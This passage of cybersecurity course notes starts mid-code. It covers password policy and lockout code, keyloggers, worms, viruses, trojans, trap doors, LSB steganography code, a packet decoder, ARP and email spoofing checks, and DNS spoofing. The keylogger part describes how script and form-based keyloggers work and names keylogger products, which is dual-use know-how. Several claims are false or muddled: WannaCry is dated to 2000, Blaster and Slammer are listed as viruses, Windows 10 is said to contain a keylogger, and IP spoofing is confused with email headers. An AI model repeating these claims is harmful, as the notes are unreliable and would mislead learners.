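    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return hmac.compare_digest(candidate, digest)


def policy_violations(password, history=(), min_length=12):
    """Return the reasons a new password should be rejected (empty list = accepted).
    `history` holds (salt, digest) pairs of the user's previous passwords."""
    reasons = []
    lowered = password.lower()
    if len(password) < min_length:
        reasons.append("shorter than %d characters" % min_length)
    if lowered in WORDLIST or any(word in lowered for word in WORDLIST):
        reasons.append("based on a dictionary word")
    if any(verify_password(password, salt, digest) for salt, digest in history):
        reasons.append("reuses a previous password")
    return reasons


class LockoutPolicy:
    """Account lockout with an attempt limit, a counter reset window and a lockout span."""

    def __init__(self, max_attempts=5, counter_window=600, lockout_duration=900):
        self.max_attempts = max_attempts
        self.counter_window = counter_window      # seconds until the failure counter resets
        self.lockout_duration = lockout_duration  # seconds an account stays locked
        self._state = {}                          # user -> {"count", "first", "locked_until"}

    def is_locked(self, user, now):
        state = self._state.get(user)
        return bool(state) and state["locked_until"] > now

    def record_failure(self, user, now):
        """Count a failed login at time `now` (seconds); returns True if the account is now locked."""
        state = self._state.setdefault(user, {"count": 0, "first": now, "locked_until": 0})
        if now - state["first"] > self.counter_window:
            state["count"], state["first"] = 0, now   # stale failures no longer count
        state["count"] += 1
        if state["count"] >= self.max_attempts:
            state["locked_until"] = now + self.lockout_duration
            state["count"], state["first"] = 0, now
        return self.is_locked(user, now)

    def record_success(self, user):
        """A successful login clears the failure counter."""
        self._state.pop(user, None)
```

A login handler would call is_locked() before even checking the password, record_failure() on a bad password and record_success() on a good one; the same LockoutPolicy object can be shared across users since state is kept per user name.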
Key loggers
Key loggers, also known as keystroke loggers, may be defined as malware that
records the keys pressed on a system and saves them to a file, which is then
accessed by the person operating the malware. A key logger can be software
or hardware.
Working: Mainly key-loggers are used to steal passwords or confidential
details such as bank information. The first key-logger was invented in the
1970s and was a hardware key logger; the first software key-logger was
developed in 1983.
1. Software key-loggers : Software key-loggers are computer programs
developed to steal passwords from the victim’s computer. However, key
loggers are also used in IT organizations to troubleshoot technical problems
with computers and business networks. Microsoft Windows 10 also has a
key-logger installed in it.
1. JavaScript based key logger – It is a malicious script which is installed
into a web page and listens for key presses through handlers such as
onKeyUp(). These scripts can be delivered by various methods, like sharing
through social media, sending as a mail attachment, or via a RAT file.
2. Form Based Key loggers – These are key-loggers which activate when
a person fills in a form online; when the submit button is clicked, all the data
or words written are sent via a file to a computer. Some key-loggers work as
an API inside a running application: it looks like a simple application, and
whenever a key is pressed it records it.
2. Hardware Key-loggers : These are not dependent on any software, as these
are hardware key-loggers. A keyboard hardware logger is a circuit attached
inside the keyboard itself, so that whenever a key of that keyboard is pressed it
gets recorded.
1. USB keylogger – There are USB connector key-loggers which have to be
connected to a computer and steal the data. Also, some circuits are built
into a keyboard so no external wire is used or visible on the keyboard.
2. Smartphone sensors – Some Android tricks are also used as key
loggers, such as the Android accelerometer sensor, which when placed near
the keyboard can sense the vibrations; the resulting graph is then used to
convert them into sentences. The accuracy of this technique is about 80%.
Nowadays crackers are using keystroke logging Trojans: malware which is
sent to a victim’s computer to steal data and login details.
So key-loggers are software malware or hardware used to steal or
snatch our login details, credentials, bank information and much more.
Some keylogger application used in 2020 are:
1. Kidlogger
2. Best Free Keylogger
3. Windows Keylogger
4. Refog Personal Monitor
5. All In One Keylogger
Prevention from key-loggers : These are listed below-
1. Anti-Key-logger – As the name suggests, these are software which
work against key loggers, and their main task is to detect key-loggers on a
computer system.
2. Anti-Virus – Many anti-virus software also detect key loggers and delete
them from the computer system. These are software-only solutions, so they
cannot get rid of hardware key-loggers.
3. Automatic form filler – This technique can be used so that the user does
not fill in forms on a regular basis; instead an automatic form filler is used,
which shields against key-loggers as no keys are pressed.
4. One-Time-Passwords – Using OTPs as passwords may be safe, as every
time we log in we have to use a new password.
5. Patterns or mouse-recognition – On Android devices use a pattern as
the password for applications, and on a PC use mouse recognition; the mouse
program uses mouse gestures instead of a stylus.
6. Voice to Text Converter – This software helps to prevent keylogging
which targets a specific part of our keyboard.
1. Worms :
Worms are similar to a virus, but a worm does not modify programs. It replicates
itself more and more to slow down the computer system. Worms can be
controlled remotely. The main objective of worms is to eat up system
resources. The WannaCry ransomware worm in 2000 exploits the Windows
Server Message Block (SMBv1) which is a resource-sharing protocol.
2. Virus :
A virus is a malicious executable code attached to another executable file that
can be harmless or can modify or delete data. When the computer program
that a virus is attached to runs, it performs some action such as deleting a file
from the computer system. Viruses can’t be controlled remotely. The ILOVEYOU
virus spreads through email attachments.
Difference between Worms and Virus :
1. Definition
Worms: A Worm is a form of malware that replicates itself and can spread to
different computers via Network.
Virus: A Virus is a malicious executable code attached to another executable
file which can be harmless or can modify or delete data.
2. Objective
Worms: The main objective of worms is to eat the system resources. It consumes
system resources such as memory and bandwidth and makes the system so slow
that it stops responding.
Virus: The main objective of viruses is to modify the information.
3. Host
Worms: It doesn’t need a host to replicate from one computer to another.
Virus: It requires a host for spreading.
4. Harmful
Worms: It is less harmful as compared.
Virus: It is more harmful.
5. Detection and Protection
Worms: Worms can be detected and removed by the Antivirus and firewall.
Virus: Antivirus software is used for protection against viruses.
6. Controlled by
Worms: Worms can be controlled by remote.
Virus: Viruses can’t be controlled by remote.
7. Execution
Worms: Worms are executed via weaknesses in the system.
Virus: Viruses are executed via executable files.
8. Comes from
Worms: Worms generally come from downloaded files or through a network
connection.
Virus: Viruses generally come from shared or downloaded files.
9. Symptoms
Worms:
 Hampering computer performance by slowing it down
 Automatic opening and running of programs
 Sending of emails without your knowledge
 Affected performance of the web browser
 Error messages concerning the system and operating system
Virus:
 Pop-up windows linking to malicious websites
 Hampering computer performance by slowing it down
 After booting, starting of unknown programs
 Passwords get changed without your knowledge
10. Prevention
Worms:
 Keep your operating system and system in an updated state
 Avoid clicking on links from untrusted or unknown websites
 Avoid opening emails from unknown sources
 Use antivirus software and a firewall
Virus:
 Installation of Antivirus software
 Never open email attachments
 Avoid usage of pirated software
 Keep your operating system updated
 Keep your browser updated as old versions are vulnerable to linking to
malicious websites
11. Types
Worms: Internet worms, Instant messaging worms, Email worms, File sharing
worms, Internet relay chat (IRC) worms are different types of worms.
Virus: Boot sector virus, Direct Action virus, Polymorphic virus, Macro virus,
Overwrite virus, File Infector virus are different types of viruses.
12. Examples
Worms: Examples of worms include Morris worm, storm worm, etc.
Virus: Examples of viruses include Creeper, Blaster, Slammer, etc.
13. Interface
Worms: It does not need human action to replicate.
Virus: It needs human action to replicate.
14. Speed
Worms: Its spreading speed is faster.
Virus: Its spreading speed is slower as compared to worms.
Trojan Horse:
 A standalone malicious program that may give full control of an infected
PC to another PC is called a Trojan horse.
 This is actually a code segment that tries to misuse its own environment.
 They somehow look attractive, but on the other hand they are really
harmful, and they actually serve as virus carriers.
 It may make copies of itself, harm the host computer system, or steal
information.
 The Trojan horse will actually do damage once installed or run on your
computer, but at first glance it will appear to be useful software.
 Trojans are designed so that they can cause serious damage by deleting
files and destroying information on your system.
 Trojans allow confidential or personal information to be compromised by
creating a backdoor on your computer that gives unauthorized users access
to your system.
 Unlike viruses, Trojans do not self-replicate or reproduce by infecting
other files, which means Trojan horse viruses differ from other computer
viruses and do not spread themselves.
 The most popular Trojan horses are Beast, Zeus, The Blackhole Exploit
Kit, Flashback Trojan, Netbus, Subseven, Y3K Remote Administration Tool,
and Back Orifice.
Trap Door:
 A trap door is a kind of secret entry point into a program that allows
anyone to gain access to the system without going through the usual
security access procedures.
 Another definition of a trap door is that it is a method of bypassing normal
authentication methods. Therefore it is also known as a back door.
 Trap doors are quite difficult to detect, and in order to find them the
programmers or developers have to go through the components of the
system.
 Programmers use trap doors legitimately to debug and test programs. Trap
doors turn into threats when dishonest programmers use them to gain illegal
access.
 Program development and software update activities should be the first
focus of security measures. An operating system that controls trap doors is
difficult to implement.
The word Steganography is derived from two Greek words: ‘stegos’, meaning
‘to cover’, and ‘graphia’, meaning ‘writing’, thus translating to ‘covered writing’ or
‘hidden writing’. Steganography is a method of hiding secret data by
embedding it into an audio, video, image, or text file. It is one of the methods
employed to protect secret or sensitive data from malicious attacks.
How is it different from cryptography?
Cryptography and steganography are both methods used to hide or protect
secret data. However, they differ in the respect that cryptography makes the
data unreadable, or hides the meaning of the data, while steganography hides
the existence of the data.
In layman’s terms, cryptography is similar to writing a letter in a secret
language: people can read it, but won’t understand what it means. However, the
existence of a (probably secret) message would be obvious to anyone who
sees the letter, and if someone either knows or figures out your secret
language, then your message can easily be read.
If you were to use steganography in the same situation, you would hide the
letter inside a pair of socks that you would be gifting the intended recipient of
the letter. To those who don’t know about the message, it would look like there
was nothing more to your gift than the socks. But the intended recipient knows
what to look for, and finds the message hidden in them.
Similarly, if two users exchanged media files over the internet, it would be more
difficult to determine whether these files contain hidden messages than if they
were communicating using cryptography.
Cryptography is often used to supplement the security offered by
steganography. Cryptography algorithms are used to encrypt secret data before
embedding it into cover files.
Image Steganography –
As the name suggests, Image Steganography refers to the process of hiding
data within an image file. The image selected for this purpose is called
the cover image and the image obtained after steganography is called
the stego image.
How is it done?
An image is represented as an N*M (in case of grayscale images) or N*M*3 (in
case of color images) matrix in memory, with each entry representing the
intensity value of a pixel. In image steganography, a message is embedded into
an image by altering the values of some pixels, which are chosen by an
encryption algorithm. The recipient of the image must be aware of the same
algorithm in order to know which pixels he or she must select to extract the
message.
Figure – Process of Image Steganography
Is steganography a secure method of communication?
When steganography is employed alone, it is security by obscurity, which might
result in the secret message being disclosed. Combining steganography and
cryptography is the greatest way to disguise a message from adversaries while
still protecting it in case it is detected.
In steganography, what algorithm is used?
One described approach entails concealing a large amount of data (picture,
audio, and text) within a colour bitmap (bmp) image. In that study the image is
filtered and segmented, with bit replacement applied to the appropriate
pixels. These pixels are chosen at random rather than in order.
Detection of the message within the cover image is done by the process
of steganalysis. This can be done through comparison with the cover image,
histogram plotting, or noise detection. While efforts are being invested in
developing new algorithms with a greater degree of immunity against such
attacks, efforts are also being devoted towards improving existing algorithms for
steganalysis, to detect the exchange of secret information between terrorists or
criminal elements.
Here’s an example of how image steganography can be implemented using Python and
the ‘PIL’ (Python Imaging Library) library:
1. Install the required libraries:
Open a command-line interface (CLI) or terminal.
Run the following command to install the ‘PIL’ library:
pip install pillow
In this example, we first convert the secret text into binary form. We then modify
the least significant bit of each color channel (red, green, and blue) of the image
pixels to store the binary representation of the secret text. To extract the secret
text, we retrieve the least significant bit of each color channel and convert it
back to ASCII characters.
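The notes describe the least-significant-bit (LSB) method but the code itself did not survive in this copy, so the following is an added example, not the original listing: it implements exactly the scheme described above (message to bits, one bit into the LSB of each red, green and blue value, and the reverse for extraction) plus a 32-bit length header so the extractor knows where the message ends. It works on a plain list of (r, g, b) tuples so it runs without Pillow; with Pillow installed, list(img.getdata()) produces that list from a real image and img.putdata(stego) writes it back. COVER is a constructed 8x8 gradient standing in for real image data.

```python
def text_to_bits(text):
    """UTF-8 encode the message and prefix a 32-bit big-endian length so the
    extractor knows how many bits to read. Bits come out most-significant first."""
    payload = text.encode("utf-8")
    framed = len(payload).to_bytes(4, "big") + payload
    return [(byte >> shift) & 1 for byte in framed for shift in range(7, -1, -1)]


def bits_to_bytes(bits):
    return bytes(int("".join(str(b) for b in bits[i:i + 8]), 2) for i in range(0, len(bits), 8))


def fits(pixels, text):
    """Capacity check: three LSBs per RGB pixel, header included."""
    return len(text_to_bits(text)) <= 3 * len(pixels)


def embed(pixels, text):
    """Hide `text` in the least significant bit of each R, G and B value, in pixel order.
    `pixels` is a list of (r, g, b) tuples (with Pillow: list(img.getdata()))."""
    if not fits(pixels, text):
        raise ValueError("cover image too small for this message")
    bits = text_to_bits(text)
    stego, idx = [], 0
    for pixel in pixels:
        channels = []
        for value in pixel:
            if idx < len(bits):
                value = (value & ~1) | bits[idx]  # clear the LSB, then set it to the message bit
                idx += 1
            channels.append(value)
        stego.append(tuple(channels))
    return stego


def extract(pixels):
    """Read the LSB of every channel, decode the length header, then the message."""
    lsbs = [value & 1 for pixel in pixels for value in pixel]
    length = int.from_bytes(bits_to_bytes(lsbs[:32]), "big")
    if 32 + 8 * length > len(lsbs):
        raise ValueError("length header exceeds image capacity; probably no message")
    return bits_to_bytes(lsbs[32:32 + 8 * length]).decode("utf-8")


def max_channel_change(cover, stego):
    """Largest change to any channel value; LSB embedding never moves a value by more than 1,
    which is why the stego image is visually indistinguishable from the cover."""
    return max(abs(a - b) for pa, pb in zip(cover, stego) for a, b in zip(pa, pb))


# Constructed 8x8 RGB cover image (a simple gradient) standing in for real image data.
COVER = [((x * 30) % 256, (y * 30) % 256, ((x + y) * 10) % 256) for y in range(8) for x in range(8)]
```

The capacity limit follows directly from the scheme: 64 pixels give 192 bits, so after the 4-byte header this cover holds at most 20 bytes of message. Because only the lowest bit of each value changes, the statistical steganalysis mentioned above (histogram comparison with the cover) is exactly what detects this method, which is why the notes recommend encrypting the payload first.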
Some of the features of image steganography in cryptography are:
Secrecy: The primary feature of image steganography is secrecy. The secret
information is hidden within the image in a way that is not easily detectable by
an unauthorized person.
Capacity: The capacity of an image to carry secret information depends on the
size of the image and the amount of information to be hidden. Generally, larger
images have a higher capacity to carry secret information.
Robustness: The image steganography technique should be robust, i.e., it
should be able to withstand image processing techniques like compression,
cropping, and resizing without affecting the hidden information.
Security: The security of the hidden information is of utmost importance. The
image steganography technique should be designed in such a way that it is
resistant to attacks like statistical analysis and brute force attacks.
Efficiency: The image steganography technique should be efficient, i.e., it
should be able to hide the secret information in the image quickly and
effectively.
Concealment: The hidden information should be concealed in the image in a
way that it is not easily distinguishable from the original image.
Retrieval: The hidden information should be retrievable by the authorized party
using a decryption key or algorithm.
Advantages of Image Steganography:
Security: Image steganography provides a high level of security for secret
communication as it hides the secret message within the image, making it
difficult for an unauthorized person to detect it.
Capacity: Image steganography has a high capacity to carry secret information
as it can hide a large amount of data within an image.
Covert Communication: Image steganography provides a covert means of
communication, as the existence of the secret message is hidden within the
image.
Robustness: Steganography techniques are often designed to be robust,
meaning that the hidden message can remain intact even when the image
undergoes common image processing operations like compression or resizing.
Resistance to Cryptanalysis: Steganography can make it difficult for
cryptanalysts to detect and analyze hidden messages as the message is
camouflaged within the image, making it difficult to separate from the image’s
natural features.
Disadvantages of Image Steganography:
Detection: Steganography can be detected if a person has the right tools and
techniques, so it is not a foolproof method of securing communication.
Complexity: Steganography can be complex and requires specialized tools
and knowledge to implement effectively.
Lengthy Transmission Time: Hiding data within an image can be a time-
consuming process, especially for large files, which can slow down the
transmission of data.
Susceptibility to Data Loss: The hidden message may be lost or distorted
during the transmission or processing of the image, resulting in a loss of data.
Misuse: Steganography can be misused for illegal activities, including hiding
malicious code or malware within an image, making it difficult to detect and
prevent cybersecurity attacks.

A sniffer, also known as a packet analyzer or network analyzer, is a tool used to


capture and analyze network traffic. It is a software or hardware tool that
intercepts and records data packets transmitted between computers or devices
on a network.
Packet sniffers are commonly used for network troubleshooting, security
analysis, and network optimization. They can be used to identify network
problems such as congestion, packet loss, or improper configurations, and they
can also be used to detect security threats such as network intrusions or
unauthorized access attempts.
Packet sniffers work by capturing packets of data as they are transmitted on the
network. These packets are then analyzed and displayed to the user in a
human-readable format, allowing them to examine the contents of the packets
and extract information from them.
Packet sniffers can be used on both wired and wireless networks, and they can
capture data from a variety of network protocols, including TCP/IP, HTTP, FTP,
and SMTP.
However, it is important to note that packet sniffers can also be used for
malicious purposes, such as intercepting sensitive information such as
passwords, credit card numbers, or personal information. Therefore, the use of
packet sniffers should be regulated and used only for legitimate purposes with
appropriate consent and legal authority.
A Sniffer is a program or tool that captures information over a network. There
are 2 types of Sniffers: Commercial Sniffers and Underground Sniffers.
1. Commercial Sniffers –
Commercial sniffers are used to maintain and monitor information over the
network. These sniffers are used to detect network problems. Network
General Corporation (NGC) is a company that offers commercial sniffers.
These can be used for:
1. Fault analysis to detect problems in a network.
2. Performance analysis to detect network bottlenecks.
2. Underground Sniffers –
Underground sniffers are malicious programs used by hackers to capture
information over a network. When an underground sniffer is installed on a
router, it can breach the security of any network whose traffic passes through
that router. It can capture:
1. Confidential messages like email.
2. Financial data like debit card details.
Components of a Sniffer:
To capture the information over the network a sniffer uses the following
components:
1. Hardware –
Sniffers use standard network adapters to capture network traffic.
2. Capture Driver –
The capture driver captures network traffic from the Ethernet wire, filters that
network traffic for the information that you want, and then stores the filtered
information in a buffer.
3. Buffer –
When a sniffer captures data from a network, it stores the data in a buffer. There
are 2 ways to store captured data –
1. You can store data until the buffer is filled with information.
2. The round-robin method, in which data in the buffer is always
replaced by new data that is captured.
4. Decoder –
The information that travels over the network is in binary format, which is not
readable. You can use a decoder to interpret this information and display it in
a readable format. A decoder helps you analyze how information is passed
from one computer to another.
Placement of Sniffer:
The most common places where you can place sniffers are:
1. Computer
2. Cable wires
3. Routers
4. Network segments connected to the internet
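The decoder component described above is the part that turns bytes from the wire into readable fields. The following is an added example, not code from the original notes: a minimal decoder for an Ethernet II frame carrying IPv4 and TCP, using only the standard library, together with a constructed sample frame (a TCP SYN between two private/test addresses, not a real capture) so it can be run offline. The IPv4 header checksum is verified as part of decoding, which is how a decoder distinguishes a corrupted or hand-forged header from a sound one.

```python
import struct

TCP_FLAG_NAMES = ["FIN", "SYN", "RST", "PSH", "ACK", "URG"]  # bit 0 .. bit 5 of the flags byte


def ipv4_checksum(header):
    """RFC 1071 one's-complement sum over 16-bit words; a valid header sums to 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(int.from_bytes(header[i:i + 2], "big") for i in range(0, len(header), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def decode_frame(raw):
    """Decode an Ethernet II frame carrying IPv4/TCP into a dict of readable fields."""
    dst, src, ethertype = struct.unpack("!6s6sH", raw[:14])
    result = {"dst_mac": mac_str(dst), "src_mac": mac_str(src), "ethertype": ethertype}
    if ethertype != 0x0800:
        return result  # not IPv4; a fuller decoder would branch on ARP, IPv6, ...
    ver_ihl, tos, total_len, ident, flags_frag, ttl, proto, chksum, sip, dip = struct.unpack(
        "!BBHHHBBH4s4s", raw[14:34])
    ihl = (ver_ihl & 0x0F) * 4  # header length in bytes (options included)
    result.update({
        "ip_version": ver_ihl >> 4,
        "src_ip": ".".join(map(str, sip)),
        "dst_ip": ".".join(map(str, dip)),
        "ttl": ttl,
        "protocol": proto,
        "ip_checksum_ok": ipv4_checksum(raw[14:14 + ihl]) == 0,
    })
    if proto != 6:
        return result
    tcp = raw[14 + ihl:14 + ihl + 20]
    sport, dport, seq, ack, offset, flags, window, _, _ = struct.unpack("!HHIIBBHHH", tcp)
    result.update({
        "src_port": sport,
        "dst_port": dport,
        "seq": seq,
        "flags": [name for i, name in enumerate(TCP_FLAG_NAMES) if flags & (1 << i)],
        "payload": raw[14 + ihl + (offset >> 4) * 4:],
    })
    return result


def build_sample_frame():
    """Constructed TCP SYN from 192.168.1.10:40000 to 203.0.113.5:80 (not a real capture)."""
    eth = struct.pack("!6s6sH", bytes.fromhex("aabbccddee01"), bytes.fromhex("aabbccddee02"), 0x0800)
    sip = bytes([192, 168, 1, 10])
    dip = bytes([203, 0, 113, 5])
    # Pack once with checksum 0, compute the checksum, then splice it into bytes 10-11.
    ip_no_sum = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0x1234, 0x4000, 64, 6, 0, sip, dip)
    ip = ip_no_sum[:10] + struct.pack("!H", ipv4_checksum(ip_no_sum)) + ip_no_sum[12:]
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 0, 0, 5 << 4, 0x02, 65535, 0, 0)
    return eth + ip + tcp
```

Real sniffers feed frames from the capture driver's buffer into a decoder like this one, one protocol layer at a time; the same structure extends to ARP, UDP and application protocols by adding branches on the ethertype and protocol fields.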

Spoofing is a completely new beast created by merging age-old deception


strategies with modern technology. Spoofing is a sort of fraud in which
someone or something forges the sender’s identity and poses as a reputable
source, business, colleague, or other trusted contact in order to obtain personal
information, acquire money, spread malware, or steal data.
Types of Spoofing:
 IP Spoofing
 ARP Spoofing
 Email Spoofing
 Website Spoofing Attack
 DNS Spoofing
IP Spoofing:
IP is a network protocol that allows you to send and receive messages over the
internet. The sender’s IP address is included in the message header of every
email message sent (source address). By altering the source address, hackers
and scammers alter the header details to hide their original identity. The emails
then look to have come from a reliable source. IP spoofing can be divided into
two categories.
 Man in the Middle Attacks: Communication between the original sender
of the message and the intended recipient is intercepted, as the term
implies. The message’s content is then changed without the knowledge of
either party. The attacker inserts his own message into the packet.
 Denial of Service (DoS) Attacks: In this technique, the sender and
recipient’s message packets are intercepted, and the source address is
spoofed. The connection has been seized. The recipient is thus flooded with
packets in excess of their bandwidth or resources. This overloads the
victim’s system, effectively shutting it down.
Drawback:
In a man-in-the-middle attack, even the receiver doesn’t know where the
connection originated. This is completely a blind attack. To successfully
carry out the attack, the attacker will require a great deal of experience and
understanding of what to expect from the target’s responses.
Preventive measures:
Disabling source-routed packets and dropping all external incoming packets
whose source address matches a local host are two of the most common
strategies to avoid this type of attack.
ARP Spoofing:
ARP spoofing is a hacking method that causes network traffic to be redirected
to a hacker. Sniffing out LAN addresses on both wired and wireless LAN
networks is known as spoofing. The idea behind this sort of spoofing is to
transmit false ARP messages onto Ethernet LANs, which can cause traffic
to be modified or blocked entirely.
The basic job of ARP is to match an IP address to a MAC address.
Attackers transmit spoofed messages across the local network. Here the
response maps the attacker’s MAC address to the victim’s IP address. Thus the
attacker gains all the information from the victim machine.
Preventive measures:
To avoid ARP poisoning, you can employ a variety of ways, each with its own
set of benefits and drawbacks. Static ARP entries, encryption, VPNs, and
packet sniffing are just a few examples.
 Static ARP entries: It entails creating an ARP entry in each computer for
each machine on the network. Because the machines can ignore ARP
replies, mapping them with sets of static IP and MAC addresses helps to
prevent spoofing attempts. Regrettably, this approach can only defend you
from some of the most basic attacks.
 Encryption: Protocols like HTTPS and SSH can also help to reduce the
probability of an ARP poisoning attempt succeeding. When traffic is
encrypted, the attacker must go through the extra effort of convincing the
target’s browser to accept an invalid certificate. Any data sent outside of
these standards, however, will remain vulnerable.
 VPN: Individuals may find a VPN to be reasonable protection, but they
are rarely suitable for larger enterprises. A VPN will encrypt all data that
flows between the client and the exit server if it is only one person making a
potentially unsafe connection, such as accessing public wifi at an airport.
Since an attacker will only be able to see the ciphertext, this helps to keep
them safe.
 Packet filters: Each packet delivered across a network is inspected by
these filters. They can detect and prevent malicious transmissions as well as
those with suspected IP addresses.
For more detail regarding MITM attacks using ARP spoofing please refer to
the MITM (Man in The Middle) Attack using ARP Poisoning.
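The static-entry and packet-filter countermeasures above both come down to watching ARP replies for mappings that should not change. The following is an added example, not code from the original notes or any real tool: it scans a sequence of observed ARP replies and reports a reply that contradicts a known-good static entry, an IP whose MAC changes, and a single MAC that starts answering for more than one IP (the pattern left by a station claiming both the gateway and a victim). SAMPLE_REPLIES and STATIC_GATEWAY are constructed for the example; in practice the tuples would come from a capture tool.

```python
def detect_arp_anomalies(replies, static_entries=None):
    """Scan observed ARP replies given as (timestamp, ip, mac) tuples and return
    (timestamp, message) alerts for:
    - a reply that contradicts a static (known-good) IP-to-MAC entry,
    - an IP whose MAC changes mid-session,
    - a single MAC answering for more than one IP."""
    static = {ip: mac.lower() for ip, mac in (static_entries or {}).items()}
    current = {}       # ip -> last MAC seen for it
    ips_by_mac = {}    # mac -> set of IPs it has claimed so far
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        if ip in static and static[ip] != mac:
            alerts.append((ts, "reply for %s from %s contradicts static entry %s" % (ip, mac, static[ip])))
        previous = current.get(ip)
        if previous is not None and previous != mac:
            alerts.append((ts, "%s moved from %s to %s" % (ip, previous, mac)))
        current[ip] = mac
        claimed = ips_by_mac.setdefault(mac, set())
        if ip not in claimed:
            claimed.add(ip)
            if len(claimed) > 1:
                alerts.append((ts, "%s now answers for %s" % (mac, ", ".join(sorted(claimed)))))
    return alerts


# Constructed sample: a legitimate gateway and host, then a third station
# answering for both of their addresses (not a real capture).
SAMPLE_REPLIES = [
    (1, "192.168.1.1", "aa:aa:aa:aa:aa:01"),
    (2, "192.168.1.20", "aa:aa:aa:aa:aa:20"),
    (3, "192.168.1.1", "de:ad:be:ef:00:99"),
    (4, "192.168.1.20", "de:ad:be:ef:00:99"),
]
STATIC_GATEWAY = {"192.168.1.1": "AA:AA:AA:AA:AA:01"}  # the known-good gateway mapping
```

Without the static table the detector still raises the "moved" and "answers for" alerts, which is why the notes rate static entries as only a partial defence: they add certainty for the addresses you pin, but the change-tracking catches the rest.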
Email Spoofing:
The most common type of identity theft on the Internet is email spoofing.
Phishers send emails to many addresses and pose as representatives of
banks, companies, and law enforcement agencies by using official logos and
headers. Links to dangerous or otherwise fraudulent websites, as well as
attachments loaded with malicious software, are included in the emails they
send.
Attackers may also utilize social engineering techniques to persuade the target
to voluntarily reveal information. Fake banking or digital wallet websites are
frequently created and linked to in emails. When an unknowing victim clicks on
that link, they are brought to a false site where they must log in with their
information, which is then forwarded to the fake user behind the fake email.
Manual Detection Method:
 Even though the display name appears to be real, if it does not match the
“From” address, it is an indication of email spoofing.
 Mail is most likely fake if the “Reply-to” address does not match the
original sender’s address or domain.
 Unexpected messages (such as a request for sensitive information or an
unwanted attachment) should be opened with caution or reported
immediately to your IT department, even if the email appears to come from a
trustworthy source.
Preventive measures:
Implement additional checks like Sender Policy Framework, DomainKeys
Identified Mail, Domain-based Message Authentication Reporting &
Conformance, and Secure/Multipurpose Internet Mail Extensions.
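The manual checks and the SPF part of the preventive measures can both be expressed in code. The block below is an added example, not part of the original page: the message and the SPF TXT record are constructed (the .test domains and the IP ranges are reserved for documentation), the DNS lookup is replaced by a dictionary, and only the ip4/ip6/all mechanisms of SPF are evaluated.

```python
"""Header sanity checks and a minimal SPF evaluation for a suspected spoof (added example)."""
import ipaddress
from email import policy
from email.parser import BytesParser

# Constructed phishing message: the display name carries the bank's address, the real
# From address and the Reply-To are elsewhere. Domains under .test are reserved, never real.
RAW_MESSAGE = b"""From: "support@examplebank.test" <alerts@mail-bulk.test>
Reply-To: refunds@examp1e-bank.test
To: customer@example.test
Subject: Urgent: verify your account
Content-Type: text/plain; charset=utf-8

Please log in at https://examp1e-bank.test/verify within 24 hours.
"""

# Constructed SPF record as it would come back from a DNS TXT query for the domain.
# A real check fetches it with DNS; here the lookup is a dictionary (assumption).
FAKE_SPF_TXT = {"examplebank.test": "v=spf1 ip4:203.0.113.0/24 ip4:198.51.100.7 -all"}

def domain_of(address):
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""

def header_findings(raw):
    """Apply the manual checks from the text to the From / Reply-To headers."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    sender = msg["From"].addresses[0]
    display, from_addr = sender.display_name, sender.addr_spec
    reply_hdr = msg["Reply-To"]
    reply_to = reply_hdr.addresses[0].addr_spec if reply_hdr and reply_hdr.addresses else ""
    findings = []
    from_domain = domain_of(from_addr)
    # A display name that is itself an address at another domain is the classic trick.
    if "@" in display and domain_of(display) != from_domain:
        findings.append(f"display name shows {display!r} but the From address is at {from_domain}")
    if reply_to and domain_of(reply_to) != from_domain:
        findings.append(f"Reply-To domain {domain_of(reply_to)} differs from From domain {from_domain}")
    return findings

def spf_result(domain, sender_ip, txt_records):
    """Evaluate the ip4/ip6/all mechanisms of a domain's SPF record against the connecting IP.
    include:, a, mx and exists: need further DNS lookups and are not handled here (assumption)."""
    record = txt_records.get(domain.lower(), "")
    if not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    verdicts = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
    for term in record.split()[1:]:
        qualifier = "+"                       # an unqualified mechanism means "+"
        if term[0] in verdicts:
            qualifier, term = term[0], term[1:]
        if term == "all":
            return verdicts[qualifier]        # "-all": anything not listed above fails
        if term.startswith(("ip4:", "ip6:")):
            net = ipaddress.ip_network(term[4:], strict=False)
            if ip.version == net.version and ip in net:
                return verdicts[qualifier]
    return "neutral"                          # record ran out without an "all" term

if __name__ == "__main__":
    for f in header_findings(RAW_MESSAGE):
        print("header:", f)
    print("SPF for examplebank.test from 192.0.2.9:", spf_result("examplebank.test", "192.0.2.9", FAKE_SPF_TXT))
```

The SPF verdict is computed for the envelope (MAIL FROM) domain of the SMTP session, which a forger of the header alone may not control; that is why the header checks and DMARC alignment are needed in addition to a passing SPF result.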
Website Spoofing Attack:
Attackers use website/URL spoofing to steal credentials and other information from unwary end-users by creating a site that looks almost identical to the genuine one, usually hosted on a look-alike domain name (typosquatting or cybersquatting on a misspelt or similar name). This is frequently done against sites that receive a lot of traffic; a cloned Facebook login page is the classic example.
DNS Spoofing:
Each machine on the Internet has an IP address, which is not the same as the familiar "www" name you type to reach a website. When you enter a web address and press Enter, the Domain Name System (DNS) resolves the domain name to the matching IP address and your browser connects there. Attackers have found ways to subvert this resolution (poisoning a resolver's cache, answering queries before the real server does, or altering hosts files) so that your traffic is redirected to a site they control. This is known as DNS spoofing.
Preventive measures:
• DNSSEC (Domain Name System Security Extensions) is the most widely used DNS-spoofing countermeasure: it adds cryptographic signatures to DNS records so that a validating resolver can verify they were not forged. The signature validation adds some latency to resolution, and it only helps if the domain is signed and the resolver validates.
• Use SSL/TLS on the website. Even if a name resolves to the wrong address, the attacker cannot present a valid certificate for the genuine domain, so the browser will warn the user. This lets the user determine that the server really belongs to the site's owner.
• Treat an "HTTPS" URL as a necessary check, not as proof of legitimacy: it shows that the connection is encrypted to a server holding a certificate for that name, not that the name itself is the site you intended. Be suspicious if a site that normally uses HTTPS suddenly loads over plain HTTP or produces certificate warnings.
